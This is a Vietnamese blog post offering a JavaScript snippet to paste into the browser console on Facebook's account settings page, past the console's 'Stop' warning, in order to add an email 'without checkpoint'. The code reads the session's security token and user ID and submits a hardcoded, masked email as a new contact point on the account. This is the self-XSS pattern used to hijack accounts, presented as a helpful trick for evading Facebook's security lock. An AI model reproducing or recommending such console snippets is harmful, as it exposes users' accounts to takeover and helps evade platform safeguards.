-->
Phản hồi email
Nhập Thông Tin
Giới Tính
Send

Share code thêm email mới vào tài khoản Facebook không checkpoint

Việc thêm một địa chỉ email mới và lạ vào tài khoản Facebook rất dễ dẫn đến tình trạng bị checkpoint (khoá bảo mật). Vậy làm cách nào để thực hiện việc này một cách an toàn nhất? Cùng theo dõi bài viết này nhé!

Share code thêm email mới vào tài khoản Facebook không checkpoint
Share code thêm email mới vào tài khoản Facebook không checkpoint

Các bước thực hiện

Bước 1: Truy cập https://www.facebook.com/settings/?tab=account trên trình duyệt web

Bước 2: Bấm chuột phải vào màn hình → chọn Kiểm tra

Bước 3: Cửa sổ DevTools được bật lên → chon tab Console → Màn hình hiển thị cảnh báo "Dừng lại"

Bước 4: Copy toàn bộ code dưới đây:


var spinR = require(["SiteData"]).__spin_r;
var spinB = require(["SiteData"]).__spin_b;
var spinT = require(["SiteData"]).__spin_t;
var jazoest = require(["SprinkleConfig"]).jazoest;
var fbdtsg = require(["DTSGInitData"]).token;
var userId = require(["CurrentUserInitialData"]).USER_ID;
var hsi = require(["SiteData"]).hsi;
var email = "[email protected]";
var url = "https://www.facebook.com/add_contactpoint/dialog/submit/";
var data = "jazoest=22134&fb_dtsg=" + fbdtsg + "&next=&contactpoint=" + email + "&__user=" + userId + "&__a=1&__dyn=&__req=1&__be=1&__pc=PHASED%3ADEFAULT&dpr=1&__rev=&__s=&__hsi=" + hsi + "&__spin_r=" + spinR + "&__spin_b=" + spinB + "&__spin_t=" + spinT;
fetch(url, {
method: 'POST',
body: data,
headers: {
'Content-Type': 'application/x-www-form-urlencoded'
}
}).then(e => e.text()).then(e => {})

Lưu ý: Nếu bạn đang gặp các vấn đề không làm được hãy liên hệ ngay với Nguyễn Xuân Dũng bằng nút bên dưới!

Bước 5: Dán toàn bộ code vào Console → bấm Enter

Bước 6: Xác minh email là xong!

See Also :
ModMobile

Subscribe YouTube ModMobile